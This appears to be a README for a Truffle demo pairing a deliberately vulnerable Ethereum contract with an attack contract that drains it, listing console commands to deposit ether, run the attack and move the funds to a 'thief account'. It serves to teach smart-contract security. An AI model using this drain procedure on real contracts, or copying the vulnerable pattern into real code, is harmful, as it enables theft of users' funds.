
Example of vulnerable contract and an attack contract that would drain all money from it

Primary LanguageJavaScript


Example of vulnerable contract and an attack contract that would drain all money from vulnerable contract.

Set up

truffle compile

truffle migrate

truffle console

truffle console commands

Get Honey pot contract address

HoneyPot.deployed().then(instance => honeyPotAddress = instance.address)

Check its balance:


Send money to honey pot address from accounts[1]:

HoneyPot.deployed().then(instance => instance.put({from: web3.eth.accounts[1], value: web3.toWei(5, "ether") }))

Check again honeypot contract balance:


Get Attack contract address:

HoneyPotCollect.deployed().then(instance => evilContractAddress = instance.address)

Check its balance:


Attack HoneyPot contract with evil contract:

HoneyPotCollect.deployed().then(inst => inst.collect({ value: web3.toWei(5, "ether"), gas: 1000000 }))

Transfer ether to the thief account:

HoneyPotCollect.deployed().then(inst => inst.kill())